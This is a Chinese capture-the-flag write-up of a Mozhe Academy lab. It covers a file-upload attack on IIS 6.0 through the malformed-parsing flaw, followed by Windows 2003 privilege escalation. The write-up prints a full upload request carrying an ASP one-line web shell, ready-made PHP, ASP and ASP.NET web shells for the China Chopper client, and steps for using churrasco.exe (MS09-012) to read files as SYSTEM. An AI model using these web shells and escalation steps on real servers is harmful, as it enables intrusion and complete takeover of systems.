（墨者学院）-主机溢出提权漏洞分析

（墨者学院）-主机溢出提权漏洞分析

原文见：https://blog.csdn.net/qq_52074678/article/details/121851873

需要的小知识大纲
1、掌握文件上传的技巧；
2、掌握IIS中间件存在的畸形解析漏洞；
3、了解Windows系统CMD命令执行；
4、了解查看操作系统安全补丁情况；
5、了解Windows操作系统的文件权限设置；
6、了解操作系统的溢出漏洞的提权方式；

小知识
1.网页开发者工具的使用和查看

按F12进入网页选项选中对应状态端，查看消息头中的server获取服务器信息，cookie获取程序语言。

2.IIS中间件存在的畸形解析漏洞==》原理见：https://www.cnblogs.com/mwyw/p/15423478.html

 

1.当建立*.asa、.asp格式的文件夹时，其目录下的任意文件都将被IIS当作asp文件来执行。==》我post的内容如下：

POST /upload.asp HTTP/1.1
Host: 219.153.49.228:47093
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1438224135191171762742440658
Content-Length: 701
Origin: http://219.153.49.228:47093
Connection: close
Referer: http://219.153.49.228:47093/
Cookie: ASPSESSIONIDSSDTCDTA=GLNBKOICFILMIAHJJCPCKKMH; ASPSESSIONIDCSSSRTQA=FJDLGGPCKBPONAJECHGHOJMP
Upgrade-Insecure-Requests: 1

-----------------------------1438224135191171762742440658
Content-Disposition: form-data; name="act"

upload
-----------------------------1438224135191171762742440658
Content-Disposition: form-data; name="upcount"

1
-----------------------------1438224135191171762742440658
Content-Disposition: form-data; name="GuFolderPath"

upload/1.asp/
-----------------------------1438224135191171762742440658
Content-Disposition: form-data; name="file1"; filename="1.asp.jpg"
Content-Type: plain/text

<%eval request("123")%>

-----------------------------1438224135191171762742440658
Content-Disposition: form-data; name="Submit"

go
-----------------------------1438224135191171762742440658　

返回的url里有http://219.153.49.228:47093/upload/1.asp/2022251136320.jpg，因为带有.asp，所以解析的时候才会当成asp来执行。实测，如果url里没有.asp则不会触发漏洞！！！

2.当文件为.asp;1.jpg时，IIS6.0同样会以ASP脚本来执行

3.服务端只需要简单的一行代码，即可用此程序实现常用的管理功能，功能代码二次编码后发送，过IDS的能力大幅提高。　目前支持的服务端脚本：PHP, ASP, ASP.NET，并且支持https安全连接的网站。

　 PHP: <?php @eval($_POST['pass']);?>
　 　ASP: <%eval request("pass")%>
　 　ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(注意: ASP.NET要单独一个文件或此文件也是Jscript语言)
　　Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。

4.cmd命令

systeminfo 该命令是Windows中用于显示关于计算机及其操作系统的详细配置信息，包括操作系统配置、安全信息、产品 ID 和硬件属性，如 RAM、磁盘空间和网卡和补丁信息等。

5.常见Windows2003微软漏洞 ==》此处有省略，可以使用WES-NG去发现可以提权的系统漏洞！！！

补丁编号KB952004 微软漏洞名称是ms09-012 即cve-2009-0079

对应提权工具churrasco.exe

churrasco.exe是2003系统一个本地提权漏洞，通过此工具可以以SYSTEM权限执行命令，从而可以达到添加用户的目的。
pr.exe

pr.exe提权windows跟踪注册表项的ACL权限提升漏洞
具体流程
1.按F12进入网页选项选中对应状态端，查看消息头中的server获取iis6.0，cookie获取程序语言为asp。

 

2.根据IIS中间件存在的畸形解析漏洞，编写能与菜刀相连的一句话木马程序

 

3.将这个txt文档上传并用burpsuite进行抓包，给对应txt文档上传新增加一个1.asp的目录，让传上去的木马可以用asp的形式运行。

 

3.将包放出去进行上传

 

4.打开菜刀右键空白区域进行添加，密码为脚本中的pass，地址为ip地址加端口加文件返回路径

语言类型选择ASP后添加启动

 

5.链接后发现c盘根目录下存在一个KEY开头的文件（通关flag就在在里面）打开后发现没有权限，思考提权。

 

 

6，找到上传文件的目录上传一个32位的cmd.exe文件进行虚拟终端操作，使用setp修改终端运行路径，再用systeminfo查看系统情况获得信息，windows2003与补丁情况

 

 

7.对比补丁编号后发现没有打编号为KB952004 的补丁，上传churrasco.exe进行提权,通过命令

Churrasco--听说是免杀版.exe "type C:\KEY_1420900.txt"查看KEY的值

获取KEY